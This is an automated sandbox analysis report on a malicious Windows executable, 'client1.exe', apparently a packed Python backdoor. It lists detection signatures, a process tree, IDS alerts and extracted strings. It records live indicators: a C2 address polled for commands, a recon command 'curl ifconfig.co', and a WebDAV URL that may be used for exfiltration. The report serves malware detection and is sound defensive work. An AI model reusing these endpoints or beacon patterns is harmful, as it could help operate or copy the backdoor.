Windows Analysis Report
client1.exe

Overview

General Information

Sample name: client1.exe
Analysis ID: 1548293
MD5: 950c13286d42ad2da05b1778c1e2d747
SHA1: 3096643a168bcc2841592c676237aa6f1132ce4c
SHA256: 31c85a75181aaacb26b304987e11920b59fadea48f15dc6996c4e5d48a1b41e0
Tags:exeuser-lontze7
Infos:

Detection

Score: 56
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

AI detected suspicious sample
Machine Learning detection for sample
Potentially malicious time measurement code found
Uses known network protocols on non-standard ports
Binary contains a suspicious time stamp
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May check the online IP address of the machine
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • client1.exe (PID: 4052 cmdline: "C:\Users\user\Desktop\client1.exe" MD5: 950C13286D42AD2DA05B1778C1E2D747)
    • client1.exe (PID: 6776 cmdline: "C:\Users\user\Desktop\client1.exe" MD5: 950C13286D42AD2DA05B1778C1E2D747)
      • cmd.exe (PID: 964 cmdline: C:\Windows\system32\cmd.exe /c "curl ifconfig.co" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • curl.exe (PID: 4032 cmdline: curl ifconfig.co MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • cmd.exe (PID: 4040 cmdline: C:\Windows\system32\cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches
Source: Process started, Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\system32\cmd.exe /c "curl ifconfig.co", CommandLine: C:\Windows\system32\cmd.exe /c "curl ifconfig.co", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\client1.exe", ParentImage: C:\Users\user\Desktop\client1.exe, ParentProcessId: 6776, ParentProcessName: client1.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "curl ifconfig.co", ProcessId: 964, ProcessName: cmd.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-04T09:49:36.882714+0100 | 2022930 | 1 | A Network Trojan was detected | 52.149.20.212 | 443 | 192.168.2.8 | 49712 | TCP
2024-11-04T09:50:15.115068+0100 | 2022930 | 1 | A Network Trojan was detected | 52.149.20.212 | 443 | 192.168.2.8 | 49723 | TCP

AV Detection

Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: client1.exe, Joe Sandbox ML: detected
Source: client1.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: client1.exe, 00000000.00000003.1455973509.00000262AABD5000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2696755408.00007FFBBB5D3000.00000002.00000001.01000000.0000000C.sdmp, select.pyd.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: client1.exe, 00000000.00000003.1456400371.00000262AABD6000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2693307504.00007FFBAA840000.00000002.00000001.01000000.00000015.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: client1.exe, 00000002.00000002.2697114928.00007FFBBB640000.00000002.00000001.01000000.00000007.sdmp, _ctypes.pyd.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: client1.exe, 00000000.00000003.1448754711.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2695572139.00007FFBAB4C7000.00000002.00000001.01000000.00000011.sdmp, _hashlib.pyd.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\_decimal.pdb$$ source: client1.exe, 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmp, _decimal.pyd.0.dr
Source: Binary string: D:\a\bcrypt\bcrypt\bcrypt-4.0.1\src\_bcrypt\target\x86_64-pc-windows-msvc\release\deps\bcrypt_rust.pdb source: _bcrypt.pyd.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: client1.exe, 00000000.00000003.1448897048.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2696852289.00007FFBBB5FC000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_decimal.pdb source: client1.exe, 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmp, _decimal.pyd.0.dr
Source: Binary string: D:\_w\1\b\libssl-1_1.pdb source: client1.exe, 00000002.00000002.2695863482.00007FFBAB626000.00000002.00000001.01000000.0000000E.sdmp, libssl-1_1.dll.0.dr
Source: Binary string: D:\_w\1\b\libssl-1_1.pdb@@ source: client1.exe, 00000002.00000002.2695863482.00007FFBAB626000.00000002.00000001.01000000.0000000E.sdmp, libssl-1_1.dll.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: client1.exe, 00000000.00000003.1449006308.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2696663196.00007FFBBB553000.00000002.00000001.01000000.00000012.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: client1.exe, 00000002.00000002.2695138214.00007FFBAB0CF000.00000002.00000001.01000000.0000000F.sdmp, libcrypto-1_1.dll.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: client1.exe, 00000000.00000003.1448897048.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2696852289.00007FFBBB5FC000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: client1.exe, 00000000.00000003.1448200962.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2696978385.00007FFBBB61D000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: client1.exe, 00000000.00000003.1447108890.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2697246600.00007FFBBCD51000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: client1.exe, 00000000.00000003.1447108890.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2697246600.00007FFBBCD51000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: client1.exe, 00000000.00000003.1449073775.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2696163480.00007FFBB1898000.00000002.00000001.01000000.0000000B.sdmp, _socket.pyd.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: client1.exe, 00000000.00000003.1453554030.00000262AABD5000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2691113570.000001692E700000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1s 1 Nov 2022built on: Mon Jan 9 20:35:28 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: client1.exe, 00000002.00000002.2695138214.00007FFBAB0CF000.00000002.00000001.01000000.0000000F.sdmp, libcrypto-1_1.dll.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\python311.pdb source: client1.exe, 00000002.00000002.2693682237.00007FFBAABCC000.00000002.00000001.01000000.00000004.sdmp, python311.dll.0.dr
Source: Binary string: D:\_w\1\b\libcrypto-1_1.pdb source: client1.exe, 00000002.00000002.2695138214.00007FFBAB151000.00000002.00000001.01000000.0000000F.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: client1.exe, 00000002.00000002.2696036271.00007FFBAB66D000.00000002.00000001.01000000.0000000D.sdmp, _ssl.pyd.0.dr
Source: C:\Users\user\Desktop\client1.exeCode function: 0_2_00007FF79F636714 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF79F636714
Source: C:\Users\user\Desktop\client1.exeCode function: 0_2_00007FF79F627820 FindFirstFileExW,FindClose,0_2_00007FF79F627820
Source: C:\Users\user\Desktop\client1.exeCode function: 0_2_00007FF79F6409B4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF79F6409B4
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FF79F636714 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,2_2_00007FF79F636714
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FF79F627820 FindFirstFileExW,FindClose,2_2_00007FF79F627820
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FF79F6409B4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00007FF79F6409B4
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAB1C2158 FindFirstFileW,2_2_00007FFBAB1C2158
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE83229 _errno,malloc,_errno,memset,MultiByteToWideChar,GetLastError,MultiByteToWideChar,MultiByteToWideChar,free,_errno,FindFirstFileW,_errno,FindNextFileW,WideCharToMultiByte,2_2_00007FFBAAE83229

Networking

Source: unknown, Network traffic detected: HTTP traffic on port 49706 -> 5000
Source: unknown, Network traffic detected: HTTP traffic on port 49710 -> 5000
Source: unknown, Network traffic detected: HTTP traffic on port 49711 -> 5000
Source: unknown, Network traffic detected: HTTP traffic on port 49716 -> 5000
Source: unknown, Network traffic detected: HTTP traffic on port 49717 -> 5000
Source: unknown, Network traffic detected: HTTP traffic on port 49718 -> 5000
Source: unknown, Network traffic detected: HTTP traffic on port 49719 -> 5000
Source: unknown, Network traffic detected: HTTP traffic on port 49720 -> 5000
Source: unknown, Network traffic detected: HTTP traffic on port 49721 -> 5000
Source: unknown, Network traffic detected: HTTP traffic on port 49722 -> 5000
Source: unknown, Network traffic detected: HTTP traffic on port 49724 -> 5000
Source: unknown, Network traffic detected: HTTP traffic on port 49725 -> 5000
Source: unknown, Network traffic detected: HTTP traffic on port 49726 -> 5000
Source: unknown, Network traffic detected: HTTP traffic on port 49727 -> 5000
Source: unknown, Network traffic detected: HTTP traffic on port 49730 -> 5000
Source: unknown, Network traffic detected: HTTP traffic on port 49731 -> 5000
Source: unknown, Network traffic detected: HTTP traffic on port 49732 -> 5000
Source: unknown, Network traffic detected: HTTP traffic on port 49733 -> 5000
Source: unknown, Network traffic detected: HTTP traffic on port 49734 -> 5000
Source: unknown, Network traffic detected: HTTP traffic on port 49735 -> 5000
Source: unknown, Network traffic detected: HTTP traffic on port 49736 -> 5000
Source: unknown, Network traffic detected: HTTP traffic on port 49737 -> 5000
Source: unknown, Network traffic detected: HTTP traffic on port 49738 -> 5000
Source: global traffic, TCP traffic: 192.168.2.8:49706 -> 146.70.87.211:5000
Source: unknown, DNS query: name: ifconfig.co
Source: Network traffic, Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.8:49712
Source: Network traffic, Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.8:49723
Source: unknown, TCP traffic detected without corresponding DNS query: 146.70.87.211
Source: global traffic, HTTP traffic detected: GET /clients/996/commands HTTP/1.1; Host: 146.70.87.211:5000; User-Agent: python-requests/2.31.0; Accept-Encoding: gzip, deflate, br; Accept: */*; Connection: keep-alive
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1; Host: ifconfig.co; User-Agent: curl/7.83.1; Accept: */*
Source: global traffic, DNS traffic detected: DNS query: ifconfig.co
Source: client1.exe, 00000002.00000002.2692343833.000001692EFE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.../back.jpeg
Source: client1.exe, 00000002.00000002.2695689625.00007FFBAB535000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://.css
Source: client1.exe, 00000002.00000002.2695689625.00007FFBAB535000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://.jpg
Source: client1.exe, 00000002.00000002.2690716906.000001692E400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://146.70.87.211:5000
Source: client1.exe, 00000002.00000002.2692478911.000001692F1D8000.00000004.00001000.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2692478911.000001692F178000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://146.70.87.211:5000/clients/996/commands
Source: client1.exe, 00000002.00000002.2692478911.000001692F1D8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://146.70.87.211:5000/clients/996/commands0
Source: client1.exe, 00000002.00000002.2692478911.000001692F1D8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://146.70.87.211:5000/clients/996/commandsP
Source: client1.exe, 00000002.00000002.2692478911.000001692F1D8000.00000004.00001000.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2692478911.000001692F178000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://146.70.87.211:5000/clients/996/commandsp
Source: client1.exe, 00000002.00000002.2690716906.000001692E400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://146.70.87.211:5000bject
Source: client1.exe, 00000002.00000002.2690809690.000001692E508000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000003.1475247941.000001692E564000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000003.1474501548.000001692E55D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://146.70.87.211:5000r
Source: client1.exe, 00000000.00000003.1448897048.00000262AABD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.co
Source: client1.exe, 00000000.00000003.1448897048.00000262AABD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.coj
Source: client1.exe, 00000000.00000003.1448897048.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1452429682.00000262AABD5000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1453212744.00000262AABD5000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1448754711.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1449176412.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1448460925.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1453554030.00000262AABD5000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1455973509.00000262AABD5000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1449073775.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1449006308.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1453344762.00000262AABD5000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1448605663.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1448200962.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1456400371.00000262AABD6000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1454128248.00000262AABD5000.00000004.00000020.00020000.00000000.sdmp, python311.dll.0.dr, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: client1.exe, 00000000.00000003.1448897048.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1453212744.00000262AABD5000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1448754711.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1449176412.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1448460925.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1453554030.00000262AABD5000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1455973509.00000262AABD5000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1449073775.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1452429682.00000262AABE0000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1449006308.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1453344762.00000262AABD5000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1448605663.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1448200962.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1456400371.00000262AABD6000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1454128248.00000262AABD5000.00000004.00000020.00020000.00000000.sdmp, python311.dll.0.dr, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: client1.exe, 00000002.00000003.1474743784.000001692E30A000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2690470308.000001692E300000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000003.1473877269.000001692E306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/post
Source: client1.exe, 00000000.00000003.1457707874.00000262AABD9000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://img.shields.io/pypi/v/cryptography.svg
Source: client1.exe, 00000002.00000002.2692478911.000001692F100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://importlib-resources.readthedocs.io/en/latest/using.html#migrating-from-legacy
Source: client1.exe, 00000002.00000003.1476629113.000001692EA76000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2690809690.000001692E508000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2690809690.000001692E5C2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000003.1476629113.000001692EA8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://json.org
Source: client1.exe, 00000002.00000003.1476840187.000001692EA9C000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000003.1489567488.000001692EADE000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000003.1474743784.000001692E30A000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000003.1492264657.000001692EADE000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000003.1476698849.000001692EAB8000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2690470308.000001692E300000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000003.1471313853.000001692E345000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000003.1473877269.000001692E306000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000003.1471112667.000001692E302000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2691849229.000001692EAED000.00000004.00000020.00020000.00000000.sdmp, base_library.zip.0.drString found in binary or memory: https://mahler:8092/site-updates.py
Source: client1.exe, 00000000.00000003.1457707874.00000262AABD9000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://mail.python.org/mailman/listinfo/cryptography-dev
Source: client1.exe, 00000002.00000002.2690716906.000001692E400000.00000004.00001000.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2690809690.000001692E508000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000003.1475247941.000001692E564000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000003.1474501548.000001692E55D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nextcl.online/remote.php/dav/files/root/
Source: client1.exe, 00000002.00000002.2690716906.000001692E400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nextcl.online/remote.php/dav/files/root/ng
Source: client1.exe, 00000002.00000002.2690716906.000001692E400000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.drString found in binary or memory: https://peps.python.org/pep-0205/
Source: client1.exe, 00000002.00000002.2693682237.00007FFBAABCC000.00000002.00000001.01000000.00000004.sdmp, python311.dll.0.drString found in binary or memory: https://peps.python.org/pep-0263/
Source: client1.exe, 00000000.00000003.1457707874.00000262AABD9000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://pypi.org/project/cryptography/
Source: client1.exe, 00000000.00000003.1457707874.00000262AABD9000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://readthedocs.org/projects/cryptography/badge/?version=latest
Source: client1.exe, 00000002.00000002.2692343833.000001692F0D4000.00000004.00001000.00020000.00000000.sdmp, client1.exe, 00000002.00000003.1474743784.000001692E30A000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2690470308.000001692E300000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000003.1473877269.000001692E306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://requests.readthedocs.io
Source: client1.exe, 00000002.00000002.2690809690.000001692E5C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
Source: client1.exe, 00000002.00000002.2690470308.000001692E300000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2690809690.000001692E5C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
Source: client1.exe, 00000002.00000002.2691355039.000001692E850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#https-proxy-error-http-proxy
Source: client1.exe, 00000002.00000002.2691355039.000001692E850000.00000004.00001000.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2691134197.000001692E750000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warnings
Source: client1.exe, 00000002.00000002.2691134197.000001692E750000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warnings.
Source: client1.exe, 00000002.00000002.2690809690.000001692E508000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://w3c.github.io/html/sec-forms.html#multipart-form-data
Source: client1.exe, 00000000.00000003.1458377423.00000262AABD6000.00000004.00000020.00020000.00000000.sdmp, LICENSE.APACHE.0.drString found in binary or memory: https://www.apache.org/licenses/
Source: client1.exe, 00000000.00000003.1458377423.00000262AABE4000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1458377423.00000262AABD6000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000002.2689980475.00000262AABE5000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1458455009.00000262AABE4000.00000004.00000020.00020000.00000000.sdmp, LICENSE.APACHE.0.drString found in binary or memory: https://www.apache.org/licenses/LICENSE-2.0
Source: client1.exe, 00000000.00000003.1453344762.00000262AABD5000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2695346488.00007FFBAB1C6000.00000002.00000001.01000000.0000000F.sdmp, client1.exe, 00000002.00000002.2695939389.00007FFBAB65B000.00000002.00000001.01000000.0000000E.sdmp, libssl-1_1.dll.0.drString found in binary or memory: https://www.openssl.org/H
Source: client1.exe, 00000002.00000003.1474743784.000001692E30A000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2690470308.000001692E300000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000003.1473877269.000001692E306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org
Source: client1.exe, 00000002.00000003.1476840187.000001692EA9C000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000003.1489567488.000001692EADE000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000003.1492264657.000001692EADE000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000003.1476698849.000001692EAB8000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2691849229.000001692EAED000.00000004.00000020.00020000.00000000.sdmp, base_library.zip.0.drString found in binary or memory: https://www.python.org/
Source: client1.exe, 00000002.00000003.1464578932.000001692E302000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000003.1464494732.000001692E331000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000003.1464181035.000001692E316000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000003.1464181035.000001692E302000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000003.1464537676.000001692E333000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2690164182.000001692DEC0000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.drString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
Source: client1.exe, 00000002.00000002.2693881322.00007FFBAAC69000.00000004.00000001.01000000.00000004.sdmp, python311.dll.0.drString found in binary or memory: https://www.python.org/psf/license/
Source: C:\Users\user\Desktop\client1.exeCode function: String function: 00007FFBAAE82734 appears 508 times
Source: C:\Users\user\Desktop\client1.exeCode function: String function: 00007FFBAAE82A04 appears 172 times
Source: C:\Users\user\Desktop\client1.exeCode function: String function: 00007FFBAB493710 appears 37 times
Source: C:\Users\user\Desktop\client1.exeCode function: String function: 00007FFBAAE81EF1 appears 1578 times
Source: C:\Users\user\Desktop\client1.exeCode function: String function: 00007FFBAAE824B9 appears 83 times
Source: C:\Users\user\Desktop\client1.exeCode function: String function: 00007FFBAAE8483B appears 126 times
Source: C:\Users\user\Desktop\client1.exeCode function: String function: 00007FFBAAE84057 appears 774 times
Source: C:\Users\user\Desktop\client1.exeCode function: String function: 00007FFBAAE86988 appears 48 times
Source: C:\Users\user\Desktop\client1.exeCode function: String function: 00007FFBAAE8300D appears 55 times
Source: C:\Users\user\Desktop\client1.exeCode function: String function: 00007FF79F622770 appears 82 times
Source: C:\Users\user\Desktop\client1.exeCode function: String function: 00007FFBAAE84D68 appears 33 times
Source: C:\Users\user\Desktop\client1.exeCode function: String function: 00007FFBAAE86889 appears 31 times
Source: unicodedata.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: python3.dll.0.drStatic PE information: No import functions for PE file found
